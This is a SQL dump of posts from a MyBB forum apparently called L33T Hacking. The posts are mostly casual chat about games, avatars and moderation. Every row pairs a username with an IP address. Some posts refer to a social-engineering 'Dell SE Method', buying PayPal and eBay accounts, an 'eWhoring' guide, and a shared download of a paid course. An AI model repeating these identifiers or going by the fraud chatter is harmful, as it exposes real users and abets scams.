`fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4772', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '62', 'R?????zo?', '1350321928', 'I\'m interested, thanks alot bro. Pm\'ing you right now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3a66ccaf07e81f2044169fcc7a261bc9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4773', '868', '4710', '71', 'RE: whats the best COD', '0', '62', 'R?????zo?', '1350322109', 'well I play CoD since COD1 and I think COD1 and COD2 was the best one so far, I mean multiplayer ofcourse. As for singleplayer I really liked mw3. sorry if I\'m oldschool :/', '94.132.244.168', '1585771688', '1', '0', '62', '1350322123', '1', '5feb5a0cda596531e9981d67adc21fb4', '0', '1350322123'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4774', '821', '4733', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350322179', '[quote=\'Timmy\' pid=\'4733\' dateline=\'1350274047\'] [quote=\'t3h jok3r\' pid=\'4578\' dateline=\'1350194065\'] Lol Greed. OT: I\'m thinking if I should drink water now or after I\'m done checking my emails. [/quote] This right here is the best answer on this thread. [/quote] Haha agreed :P I think you should drink after it though :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ba86e9074161d66000299c44543b3e1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4775', '881', '0', '35', 'Which Signature Is Better ? | Rate My Graphics !!!', '17', '228', 'VirtualLegend', '1350322703', '[color=#32CD32][size=medium][align=center]Hello LH Members, I have made two signatures today and i want one signature as my LH Signature but i can\'t choose. Also Give me Tips !!!! First Signature That i made was this one: [img]http://i.imgur.com/48CAr.jpg[/img] Second Signature that i made was this one: [img]http://i.imgur.com/FmG4b.jpg[/img] Be really honest what do you think about my work and give me Tips !!! [/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd780d10b4ae7af72d81478bf0bfac681', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4776', '876', '4742', '7', 'RE: Anyone have a paypal + ebay I can buy off you?', '0', '222', 'Exposé', '1350324921', 'Would they want to sell the account?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b50a04e3e31da7b27cd85402441b7e50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4777', '882', '0', '9', '[ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350327955', '[color=#32CD32][align=center][size=medium]Hello LH Members, Today I Have a Wonderfull Product for you People. Named \'Google Sniper 2.0\'. Google Sniper 2.0 is a step by step video tutorial on how to make and increase your earnings on Clickbank and other CPA networks. [u][i][b]Google Sniper 2.0 Info:[/b][/i][/u] Name: Google Sniper 2.0 Creator: George Brown Main Focus: Affiliate Marketing Launch Date: February 14th, 2011 Regular Price: $47 Official Website: http://gsniper2.com/ [img]http://cdn.dbpmarketing.com/wp-content/uploads/2010/10/Google-Sniper-2.jpg[/img] To get this Product Leave a Comment Below that you want it, and i will send you the Download Link. It\'s a huge file and the reason that I don\'t give the DL is because i want this thread to be alive for a while , so that other people will see this thread [color=#FFD700][color=#32CD32][size=x-large]Download Link: https://www.dropbox.com/sh/brzin7t6f6v97gw/3k6aWOj8-6[/size][/color][/color] PEACE OUT !!! [/size][/align][/color]', '83.83.167.183', '1397991351', '1', '0', '228', '1350575719', '1', 'e8e0a4a58bbaeb96cc32a680a4c7d5a3', '0', '1350575719'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4778', '875', '4739', '3', 'RE: New LH Avatars', '0', '82', 'iTzIpod', '1350328734', 'Thanks though. I\'ll change it when I have the time. :p Don\'t change it for me. I need to save my Image.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6b1d9df72d78c53bfcea4db74cb1c89d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4779', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350328761', 'Okay. Thanks. Download the .PSD File :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1c28fbe38f3440e51115ea53027e9c5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4780', '881', '4775', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '0', '82', 'iTzIpod', '1350328799', 'I like the 2nd one better. Could add a Black Border around it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6a47e48bec90f6ce88ed5d4cbd4d77fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4781', '876', '4742', '7', 'RE: Anyone have a paypal + ebay I can buy off you?', '0', '82', 'iTzIpod', '1350328816', 'Let me ask. I forgot :/ I think so yes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69441dbd72f6880ff792908f03c85e2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4782', '881', '4780', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '0', '228', 'VirtualLegend', '1350329117', '[quote=\'iTzIpod\' pid=\'4780\' dateline=\'1350328799\'] I like the 2nd one better. Could add a Black Border around it? [/quote] Thanks For the Feedback', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4403fccdfa9275e690e359aa4c0e06a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4783', '875', '4762', '3', 'RE: New LH Avatars', '0', '1', 't3h jok3r', '1350329358', '[quote=\'ƒ???????????g\' pid=\'4743\' dateline=\'1350276353\'] Wanna make me one :P...idk what would be in the avatar but yeh....:P [/quote] If you want one then just tell me what do you want the avatar to be about :) [quote=\'??????????¢™\' pid=\'4762\' dateline=\'1350310473\'] Damnn that is sick AF, I like how it changes everytime you refresh. Mind making me one? [/quote] AF? You sir will be demoted in 2 seconds and 1 millisecond. [quote=\'iTzIpod\' pid=\'4778\' dateline=\'1350328734\'] Thanks though. I\'ll change it when I have the time. :p Don\'t change it for me. I need to save my Image. [/quote] Cool PM me for the link when you want it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8d4c64f18bb56ced886d32b79fa791f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4784', '883', '0', '7', 'Congratz virtual', '0', '4', 'Triple H', '1350329533', 'Congratz virtuallegend i just noticed that you become mod. I wonder how he became mod :?:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0729f091ec2567b677db45638971c16b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4785', '331', '1545', '5', 'RE: New Rules and Instructions v.4', '0', '1', 't3h jok3r', '1350330002', 'Welcome back and updated the thread. Added Advertising rule.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b0775af5a0eecc9e23c2cc05ed893d9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4786', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '228', 'VirtualLegend', '1350330679', 'Seems Awesome and Easy :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '713bf4f445cdb3a018d3cd5e418c05bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4787', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '228', 'VirtualLegend', '1350330893', 'Nice Tutorial/Guide Hoping to see more of them', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd5ef632f32d71a06945ce6eda5c03595', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4788', '875', '4739', '3', 'RE: New LH Avatars', '0', '222', 'Exposé', '1350331514', 'DEMOTE HIMMMMMMM. Lmao.....just kidding', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'eb327e344ed65bc73176d20d280ed630', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4790', '861', '4766', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350334997', '[quote=\'sirchamp\' pid=\'4766\' dateline=\'1350319227\'] Pretty nice what we have already reached. I think the biggest.problem is that when you searcch for this forum on google and click the first page, an error comes. //posting this in Austria with my ipad.sorry for all the mistakes [/quote] How I didn\'t even know that. I will create a redirect, that\'s bad SEO. Thanks for reporting.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6d6c918f111e0e9a1f0fe7c964350e8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4791', '515', '4753', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1350335352', '[quote=\'iTzIpod\' pid=\'4753\' dateline=\'1350301059\'] I voted already. Looooool :D One of the votes are mine. [/quote] I remember you voting, it was like the 5th vote or something.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6393d2d59e559e714e2b0f81fc6173a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4792', '864', '4640', '79', 'RE: Need some coder to check this code', '0', '1', 't3h jok3r', '1350335647', 'Umm so you think the script is clean?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '64bc1c6002680b3216611b0da01a0521', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4793', '875', '4739', '3', 'RE: New LH Avatars', '0', '1', 't3h jok3r', '1350336613', 'Added 3 more avatars in the spoiler which can be found in the OP. Enjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cd78cb235b8ec8424dcf84aa1a032d24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4794', '869', '4712', '74', 'RE: who loves counter strike', '0', '2', 'Apathy', '1350337772', 'I just finished playing CSS.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '306caeb31d788913f4abca41c7d2b25a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4795', '884', '0', '2', 'Testing new Mycodes', '0', '1', 't3h jok3r', '1350338202', '[b]Google Search Mycode[/b] [gsearch]L33T Hacking[/gsearch] [code] [gsearch]L33T Hacking[/qsearch] [/code]', '72.231.24.165', '1223104677', '1', '0', '1', '1350338211', '1', 'a47f376d507c9ee9dd07bc23c7c64ded', '0', '1350338211'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4796', '884', '4795', '2', 'RE: Testing new Mycodes', '0', '1', 't3h jok3r', '1350338325', '[b]Highlight Text[/b] [hl=Yellow]Hi there[/hl] [code] [hl=Yellow]Hi there[/hl] [/code]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bfbb961828f787b5e1272a3d3c000950', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4797', '875', '4783', '3', 'RE: New LH Avatars', '0', '3', '??????????¢™', '1350339753', '[quote=\'t3h jok3r\' pid=\'4783\' dateline=\'1350329358\'] [quote=\'ƒ???????????g\' pid=\'4743\' dateline=\'1350276353\'] Wanna make me one :P...idk what would be in the avatar but yeh....:P [/quote] If you want one then just tell me what do you want the avatar to be about :) [quote=\'??????????¢™\' pid=\'4762\' dateline=\'1350310473\'] Damnn that is sick AF, I like how it changes everytime you refresh. Mind making me one? [/quote] AF? You sir will be demoted in 2 seconds and 1 millisecond. [quote=\'iTzIpod\' pid=\'4778\' dateline=\'1350328734\'] Thanks though. I\'ll change it when I have the time. :p Don\'t change it for me. I need to save my Image. [/quote] Cool PM me for the link when you want it. [/quote] AF means As Fuck dude.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5d359450d71891afc2c281adedf13519', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4798', '729', '4516', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1350339948', '[quote=\'iTzIpod\' pid=\'4516\' dateline=\'1350157358\'] There was a way to delete this. My friend told me how. But I forgot. Something to do with %appdata% though. [/quote] Yes you gotta go into your PC Hard Drive or whatever and look for something to do with appdata.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'b5ffb76c2f032814289b646f0b54e46a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4799', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '3', '??????????¢™', '1350340504', 'I will follow this tut. Off-Topic: Who is VirtuealLegend? Only has 18 posts and joined about a week ago and is already a mod? Hmmm.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5e8e44843f5b555e01b19e5b9a75921a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4800', '780', '4024', '17', 'RE: Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '228', 'VirtualLegend', '1350341367', 'Thanks for the Nice Share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ed06c76f9d9dfdbc68a1636c28eb5c44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4801', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '228', 'VirtualLegend', '1350341450', 'I\'m Very Intrested Could you send me a Copy ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b36be4485da7fe61ef6d385bca41322b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4802', '883', '4789', '7', 'RE: Congratz virtual', '0', '61', 'NXK', '1350343491', '[quote=\'ƒ???????????g\' pid=\'4789\' dateline=\'1350333180\'] Everyone gettin Supermod but me.....:rage: [/quote] He\'s a normal mod, I\'m a Supermod. And we\'ve been talking about promoting him for a while, He is a very high quality user and Will deditcate alot of time to Help us grow.', '99.253.94.204', '1677549260', '1', '0', '61', '1350343537', '1', '496ea5b029c8982d3104454d4b318804', '0', '1350343537'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4803', '883', '4784', '7', 'RE: Congratz virtual', '0', '82', 'iTzIpod', '1350344771', 'How come I don\'t get promoted to SMod? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f864934b9479d83554dc44cfe5f5c63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4819', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350352739', '/Request Thread Closed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4471573d6ec80adb1fff1638cc115ae6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4805', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350344861', 'Lol. I voted yesterday. You can vote every 24 hours.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2fbbda9c2040161887f02b58ef5eb967', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4809', '868', '4710', '71', 'RE: whats the best COD', '0', '228', 'VirtualLegend', '1350347588', 'I Like Black Ops cuz of the Zombie Mode But MW3 is now my favorite But on 13/11/2012 is Black Ops 2 my favorite COD game', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dfc49a5c23493288dfec26fe22acd71c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4807', '883', '4784', '7', 'RE: Congratz virtual', '0', '228', 'VirtualLegend', '1350346527', 'Thanks Triple H, I Will do my best to help LH Forum :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f34405264f14c70bdb732b4299511a3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4808', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '228', 'VirtualLegend', '1350346828', 'My Top 3: 1. Iron Man 2. Iron Man 2 3. Limitless', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '23aafee18f57231895180a6fb5ec37db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4810', '868', '4710', '71', 'RE: whats the best COD', '0', '257', 'XxTREYZxX', '1350347649', 'nhaa thats all good so yeah', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '287bd6b5ecf65bb769e3f21c872a1520', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4811', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350348003', 'ohh thats sucks i ask the admin', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '607099283251278cf5d4326a97248b89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4812', '885', '0', '71', 'Who Has Already Pre-Ordered Black Ops 2 ?', '0', '228', 'VirtualLegend', '1350348181', '[color=#32CD32][align=center][i][size=medium]Wazup Gamers, I can\'t wait to get the new Black Ops 2. I have already played it at the first look AND IT WAS AWESOME + DOUTZEN KROES WAS THE BOOTH BABE THERE. I have Pre-ordered black ops 2 hardened edition. That includes a few Double XP coins and Nuketown as a ZOMBIE MAP !!!!. I\'m a Hardcore gamer, so that\'s why I\'m getting the Hardened Edition. But What About YOU?[/size][/i][/align][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '002ba9d4625f3989d6c7fa226b3b7ed7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4813', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '100', '??zg???g????61', '1350348459', 'Could I have the download? Thanks in advance man!', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'cda153d32930467d780ddb680c91f364', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4814', '880', '4765', '9', 'RE: [FREE] How to make a fortune by playing Fifa [LEAKED]', '0', '100', '??zg???g????61', '1350348858', 'Your right haha, edited my thread :D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '7f0f7f23a51b9734a2cd4272aa5326c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4815', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '100', '??zg???g????61', '1350349549', 'Hey If I could have this that would be AMAZING. I could really use this. ;-p', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '900dcd9494cb0ee95b194f5406878f0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4816', '885', '4812', '71', 'RE: Who Has Already Pre-Ordered Black Ops 2 ?', '0', '257', 'XxTREYZxX', '1350349696', 'yeah so i have i i preordered the care package edition', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '2a94081a47050d0a7304d69fb59138fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4817', '882', '4813', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350349825', '[quote=\'??zg???g????61\' pid=\'4813\' dateline=\'1350348459\'] Could I have the download? Thanks in advance man! [/quote] I have Send You the Download Link Good Luck (y)', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '494b45e09baffce51800586ec0653641', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4818', '885', '4816', '71', 'RE: Who Has Already Pre-Ordered Black Ops 2 ?', '0', '228', 'VirtualLegend', '1350349927', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'4816\' dateline=\'1350349696\'] yeah so i have i i preordered the care package edition [/quote] Thats Even More Awesome I Bet You Will troll People with the Helicopter Toy :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e31a6d3a43d00722600f46762e471bad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4820', '886', '0', '35', 'My logo', '0', '257', 'XxTREYZxX', '1350352852', 'hey l33T, 